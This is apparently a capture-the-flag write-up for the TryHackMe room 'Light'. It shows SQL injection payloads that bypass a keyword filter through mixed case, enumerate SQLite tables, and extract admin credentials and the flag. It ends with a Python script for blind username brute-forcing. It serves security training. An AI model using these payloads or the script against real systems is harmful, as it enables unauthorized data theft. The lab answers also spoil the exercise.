| Machine Name | OS | IP Address | Difficulty |
|---|---|---|---|
| Light | Linux | 10.10.89.204 | Easy |
What is the admin username?
A service is running on port 1337, and we can interact with it using:
nc 10.10.144.115 1337
After providing various inputs, the following responses indicate different behaviors:
└─# nc 10.10.144.115 1337
Welcome to the Light database!
Please enter your username: smokey
Password: vYQ5ngPpw8AdUmL
Please enter your username: test
Username not found.
Please enter your username: '
Error: unrecognized token: "''' LIMIT 30"
The error triggered by a single quote (') suggests a SQL injection vulnerability.
We aim to identify the underlying database management system (DBMS). Based on the room’s name, Light, it is likely running SQLite.
However, certain characters and keywords are restricted:
Please enter your username: --
For strange reasons I can't explain, any input containing /*, -- or, %0b is not allowed :)
Please enter your username: UNION
Ahh there is a word in there I don't like :(
Please enter your username: SELECT
Ahh there is a word in there I don't like :(
Despite this, we can bypass the filter using a mix of lowercase and uppercase characters. Using this technique, we can identify the SQLite version:
Please enter your username:' UnIoN SeLect sqlite_version() '
Password: 3.31.1
Next, we enumerate the table names:
Please enter your username:' UnIoN SeLect group_concat(name, ',') FROM sqlite_master WHERE type='table
Password: usertable,admintable
| Note: group_concat is used here to return results as a single column, which is required by the output format.
To enumerate the columns of the admintable:
Please enter your username:' UnIoN SeLect group_concat(name, ',') FROM pragma_table_info('admintable') '
Password: id,username,password
Now we extract all usernames from the admintable:
Please enter your username:' UnIoN SeLect group_concat(username, ',') FROM admintable '
Password: TryHackMeAdmin,flag
✅ The admin username is: TryHackMeAdmin
What is the password to the username mentioned in question 1?
To extract the admin password:
Please enter your username:' UnIoN SeLect password from admintable where username='TryHackMeAdmin
Password: mamZtAuMlrsEy5bp6q17
✅ The admin password is: mamZtAuMlrsEy5bp6q17
What is the flag?
We retrieve the value for the flag user:
Please enter your username:' UnIoN SeLect password FROM admintable WHERE username='flag
Password: THM{SQLit3_InJ3cTion_is_SimplE_nO?}
✅ Flag: THM{SQLit3_InJ3cTion_is_SimplE_nO?}
Enumerating Users via Blind SQL Injection
The following Python script performs brute-force enumeration of usernames based on prefix matching in the current context:
import socket
import string
import threading
def bruteforce_username(target_ip, target_port, prefix=""):
alphabet = string.ascii_lowercase
for char in alphabet:
attempt = f"{prefix}{char}%"
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((target_ip, target_port))
s.recv(1024) # Welcome message
response = s.recv(1024).decode('utf-8') # Prompt for username
s.sendall((f"' or username like '{attempt}\n").encode('utf-8'))
response = s.recv(1024).decode('utf-8')
if "Password:" in response:
print(f"[+] Valid username prefix: {prefix}{char}")
threading.Thread(target=bruteforce_username, args=(target_ip, target_port, prefix + char)).start()
elif "Username not found." in response:
continue
target_ip = "10.10.144.115"
target_port = 1337
bruteforce_username(target_ip, target_port)
⚠️ This approach is significantly slower and should be used as a last resort for blind enumeration.